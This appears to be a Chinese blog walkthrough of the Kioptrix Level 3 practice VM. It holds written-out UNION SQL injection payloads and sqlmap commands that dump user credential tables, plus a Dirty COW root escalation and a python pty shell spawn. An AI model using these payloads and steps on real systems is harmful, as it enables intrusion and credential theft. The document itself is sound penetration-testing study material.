首页 > 其他分享 >Kioptrix-Leve Three思路整理

Kioptrix-Leve Three思路整理

时间:2025-01-10 22:29:17浏览次数:3  
标签:Kioptrix group -- Three 密码 select gallery Leve 页面

序列

个人博客:https://www.xenoecho.us.kg/
喜欢的朋友可以搜索公众号“泷羽Sec-小篮子”还有文章中和渗透中工具和文章在筹备着,另外学习没思路?安全不知道怎么学习的朋友可以了解一下公众号内的红队全栈公益课,以及OSCP证书报考指南哦!
在这里插入图片描述

基本信息

  • 基本信息攻击机:192.168.38.128;靶机:192.168.38.132;靶机Kioptrix-Leve 3
    Pasted-image-20241226172730

web样式无法显示的问题

  • 原因:样式是以这个域名为基准链接的,而这个域名解析其实要到本地靶机的地址的。
    Pasted-image-20241226174609
    修改hosts文件,将这个域名指向靶机地址,然后刷新一下就可以正常显示了。
echo "192.168.38.132 kioptrix3.com" >>/etc/hosts

Pasted-image-20241226192249

信息收集

dirb目录扫描

Pasted-image-20241226192249

dirsearch目录扫描

Pasted-image-20241226192430

whatweb指纹

Pasted-image-20241226192700

nmap服务扫描

  • 只有8022端口开放的
    Pasted-image-20241226192926

主机详细信息

  • 操作系统:Ubuntu Liunx
  • 内核版本:Linux 2.6.9 - 2.6.33
服务信息
端口服务版本
22/tcpsshOpenSSH 4.7p1
80/tcphttpApache httpd 2.2.8
php5.2.4-2ubuntu5.6

查找攻击点

Web服务|80

页面探索

根据扫描出来的页面进行访问查看有无可疑点,例如常见的一些Web漏洞。

cache路径
  • 三个页面返回404,now进入到另一个目录的页面。
    Pasted-image-20241230164629
gallery路径
  • 不同照片跳转不同路径的页面
    Pasted-image-20241230165649
  • 照片页面有传参,后续尝试抓包测试
    Pasted-image-20241230165733
参数测试
  • 参数对应,除了能改评分多少似乎没任何作用,阿巴阿巴。。。
    Pasted-image-20241231184205
  • 只能改一次!给了个50分。
    Pasted-image-20241231184126
针对路径扫描
  • 针对/gallery/路径重新扫描一遍,有时候会遗漏掉一些铭感文件或路径。
    Pasted-image-20250101172421
  • 数据库文件,暂时先留着。
    Pasted-image-20250101145945
  • 照片管理后台和泄露的版本文件。尝试万能密码无效果。
    Pasted-image-20250101171348
  • 发现页面存在SQL注入,根据后台版本去查找poc刚好也指向这个页面
    Pasted-image-20250101172716
SQL手动测试
  • order by根据第七个字段进行排序的时候报错了,证明只有六个字段
id=1 order by 6 -- 

Pasted-image-20250101183236

  • 联合查询六个字段,只显示查询的2,3字段,判断出显错点为2,3。
1 union select 1,2,3,4,5,6 -- 

Pasted-image-20250101183821

  • 根据已知的显错点,将字段查询改为数据库查询。得知数据库为gallery
1 union select 1,2,database(),4,5,6 -- 

Pasted-image-20250101184150

  • 查询gallery数据库中含有的表
1 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema="gallery" -- 

Pasted-image-20250101185819

  • 注意到有个users表,查询他表的字段,注意到有用户名和密码字段
1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name="gallarific_users" -- 

Pasted-image-20250101190611

  • 查询表中用户名和密码字段的数据
1 union select 1,group_concat(username),group_concat(password),4,5,6 from gallarific_users

Pasted-image-20250101191038

  • 不过这个是博客后台的登录密码,回到了之前发现的后台页面登录进去,尝试文件上传,无效果。
    Pasted-image-20250101191710
  • 继续查询,注意到一可疑的dev_accounts。查询字段
1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name="dev_accounts"

Pasted-image-20250101192016

  • 查询表中的数据
1 union select 1,group_concat(username),group_concat(password),4,5,6 from dev_accounts

Pasted-image-20250101192304

  • 通过MD5解密得知用户对应的密码,解密的网站:MD5在线解密原理其实和碰撞一样,不过碰撞需要时间。而他有数据库记录了一些常见的。
用户名密码
dregMast3r
loneferretstarwars
sqlmap|工具注入
#获取当前数据库
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch --current-db
#查询数据库中的表
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -tables
#获取表的数据
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -T gallarific_users,dev_accounts --dump
用户提权|方法一
  • 尝试SSH登录两个账户需要指定密钥,权限等级都为普通权限
ssh -oHostKeyAlgorithms=+ssh-rsa loneferret@192.168.38.132

Pasted-image-20250101194037

  • 查看系统内核架构和版本
    Pasted-image-20250101201836
  • 查找poc,ubuntu下没可用poc内核需要进一步使用。
    Pasted-image-20250102022918
  • -m复制到当前目录利用pythonhttp服务上传上去。漏洞名字为:Dirty COW
    Pasted-image-20250102031002
  • 根据exp提示输入新密码,然后等待一段是时间就创建出一个新的用户和密码。
    Pasted-image-20250102031454
  • 使用新用户和密码登录,直接是管理员权限了。
    Pasted-image-20250102031720
phpmyadmin目录
  • 一个phpmyadmin登录页面。
    Pasted-image-20241231200305
  • 用户名使他闭合成功登录进去,不过看了看只能看到表的结构看不到内容
    Pasted-image-20250101150954
  • whatweb获取指纹的版本信息,查找poc,未发现可留用点。
    Pasted-image-20241231201620
  • 管理系统的安装,不过没密码,尝试万能密码没效果。尝试使用上一个目录的密码也无效果。
    Pasted-image-20250101150810
根目录
  • 通过探索发现存在两个传参测试能爆出路径,不过不是伪协议。
    Pasted-image-20250106020512
  • 在登录页面测试,不存在sql注入,注意到下面有个技术支持的,这个在信息收集中很重要。
    Pasted-image-20250106020815
  • 查找相关的poc,发现存在历史漏洞,不过第一个要用msf掠过先去看第二个多个漏洞的poc
    Pasted-image-20250106021250
  • 只存在XSSCSRF打靶机时没作用。。。。
    Pasted-image-20250106021806
  • 查找到一个远程命令执行expgit下载测试并执行。exp地址:地址
    Pasted-image-20250106024948
  • 最近刚学到的一个方式来执行bash,通过python来创建一个提示python -c 'import pty;pty.spawn("/bin/bash")'
    Pasted-image-20250106030721
  • 获取系统信息
    Pasted-image-20250106030721
  • 使用exp获取,和上一个方法一样提权。
    Pasted-image-20250106031935
  • 登录提权成功
    Pasted-image-20250102031720

标签:Kioptrix,group,--,Three,密码,select,gallery,Leve,页面
From: https://blog.csdn.net/m0_56054516/article/details/144991878

相关文章

  • ThreeJS入门(217):THREE.DRACOExporter 知识详解,示例代码
    作者:还是大剑师兰特,曾为美国某知名大学计算机专业研究生,现为国内GIS领域高级前端工程师,CSDN知名博主,深耕openlayers、leaflet、mapbox、cesium,webgl,ThreeJS,canvas,echarts等技术开发,欢迎加微信(gis-dajianshi),一起交流。查看本专栏目录-本文是第217篇入门文章......
  • 攻防世界 - Misc - Level 2 | funny_video
    关注这个靶场的其它相关笔记:攻防世界(XCTF)——靶场笔记合集-CSDN博客0x01:考点速览本题的考察的是MISC中的音频隐写,要想过此关,你需要知道以下知识点:使用MKVToolNix查看非默认声道并导出。(xxx.mp3)使用Audacity查看音频的“频谱图”。0x02:WriteUP将附件从靶......
  • 攻防世界 - Misc - Level 2 | Hear-with-your-Eyes
    关注这个靶场的其它相关笔记:攻防世界(XCTF)——靶场笔记合集-CSDN博客0x01:考点速览本题考察的是Misc中的音频隐写题,通过本关我们可以学习到以下知识点:如何使用Audacity查看音频”频谱图“。0x02:WriteUP将附件从靶场中下载下来,是一个gz格式的文件,其实也就是L......
  • Three.js教程015:全面讲解Three.js的UV与应用
    文章目录全面讲解UV与应用UV介绍代码演示完整代码全面讲解UV与应用UV介绍在Three.js中,UV坐标(也称为纹理坐标)是用来定义纹理如何映射到三维模型上的一组二维坐标。UV坐标的范围通常是(0,0)到(1,1),其中:U对应纹理的横向轴(类似于X轴)。V对应纹......
  • CDS标准视图:催款级别分配 I_DunningLevelDistribution
    视图名称:催款级别分配I_DunningLevelDistribution视图类型:基础视图视图代码:点击查看代码@AbapCatalog.sqlViewName:'IFIDUNLVLDISTR'@VDM.viewType:#COMPOSITE@EndUserText.label:'DunningLevelDistribution'@Analytics:{dataCategory:#CUBE}@Analytics.intern......
  • 活动图一般都是high-level,很少用来描述用例模板中的流,对吧?-这次回答的还比较靠谱
    是的,从实践经验来看,**活动图通常用于高层次的流程建模**,更多关注的是某个用例的行为或业务逻辑整体,而不是详细到专门描述用例模板中的所有基本流(BasicFlow)或可选流(AlternativeFlow)。换句话说,活动图一般从更广阔的视角来描述用例的执行逻辑,而不是直接一一映射用例模板的流。......
  • Three.js 数学工具:构建精确3D世界的基石
    文章目录前言一、向量(Vectors)二、矩阵(Matrices)三、四元数(Quaternions)四、欧拉角(EulerAngles)五、颜色(Colors)六、几何体生成器(GeometryGenerators)七、随机数生成(RandomNumberGeneration)八、时间和动画(TimeandAnimation)九、光线追踪与碰撞检测(RayTracingandCollisi......
  • 80个Three.js 3D模型资源
    Three.js3D模型资源”涵盖了在WebGL和JavaScript环境下使用three.js库进行3D建模和渲染的基础知识。Three.js是目前最流行的JavaScript库之一,用于创建和展示交互式的3D图形。它允许开发者在浏览器中直接构建复杂的三维场景,无需深入学习底层的WebGLAPI。Party1让我们了解......
  • 原生的Three.js Cesium.js的 开源案例 已获近1000Star
    纯原生threecesium案例由于前端得发展,three.js和cesium.js越来越被越来越多得前端接触到,由于其学习路线比较复杂,且官网案例覆盖不全,因此在今年我们共同搭建了一个免费得three和cesium案例学习平台,未来将免费逐步的更新案例。主要侧重于开发者的技术交流......
  • 纯原生 three cesium 案例 已获近 1000Star
    纯原生threecesium案例由于前端得发展,three.js和cesium.js越来越被越来越多得前端接触到,由于其学习路线比较复杂,且官网案例覆盖不全,因此在今年我们共同搭建了一个免费得three和cesium案例学习平台,未来将免费逐步的更新案例。主要侧重于开发者的技术交流......